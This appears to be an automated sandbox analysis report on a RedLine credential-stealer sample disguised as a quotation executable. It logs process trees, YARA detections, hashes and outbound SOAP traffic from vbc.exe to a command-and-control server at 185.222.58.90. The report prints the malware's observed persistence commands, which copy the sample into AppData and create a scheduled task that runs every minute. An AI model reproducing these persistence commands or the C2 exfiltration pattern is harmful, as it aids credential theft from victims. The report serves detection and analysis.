                                                        Date: Thu, 16 Jun 2022 12:44:33 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        4 | 192.168.2.5 | 49917 | 185.222.58.90 | 17910 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Jun 16, 2022 14:44:33.749598026 CEST | 15406 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105821
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:44:33.773118973 CEST | 15406 | IN | HTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:34.003176928 CEST | 16503 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:33 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        5 | 192.168.2.5 | 49918 | 185.222.58.90 | 17910 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Jun 16, 2022 14:44:38.557275057 CEST | 16504 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:44:38.580869913 CEST | 16504 | IN | HTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:38.605325937 CEST | 16505 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:38 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Jun 16, 2022 14:44:43.686079979 CEST | 16505 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:44:43.709475040 CEST | 16505 | IN | HTTP/1.1 100 Continue



                                                        Target ID:0
                                                        Start time:14:42:25
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\Desktop\QUOTATION 061622.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QUOTATION 061622.exe"
                                                        Imagebase:0xb70000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Target ID:5
                                                        Start time:14:42:49
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Imagebase:0x11e0000
                                                        File size:2688096 bytes
                                                        MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        Target ID:7
                                                        Start time:14:42:51
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:8
                                                        Start time:14:42:51
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:9
                                                        Start time:14:42:52
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:10
                                                        Start time:14:42:52
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:11
                                                        Start time:14:42:53
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x960000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:12
                                                        Start time:14:42:54
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:14
                                                        Start time:14:43:01
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0xf80000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 49%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:21
                                                        Start time:14:43:32
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Imagebase:0x11e0000
                                                        File size:2688096 bytes
                                                        MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        Target ID:22
                                                        Start time:14:43:35
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:23
                                                        Start time:14:43:35
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:24
                                                        Start time:14:43:36
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:25
                                                        Start time:14:43:37
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:26
                                                        Start time:14:43:37
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x960000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:27
                                                        Start time:14:43:38
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:31
                                                        Start time:14:44:01
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0xf80000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
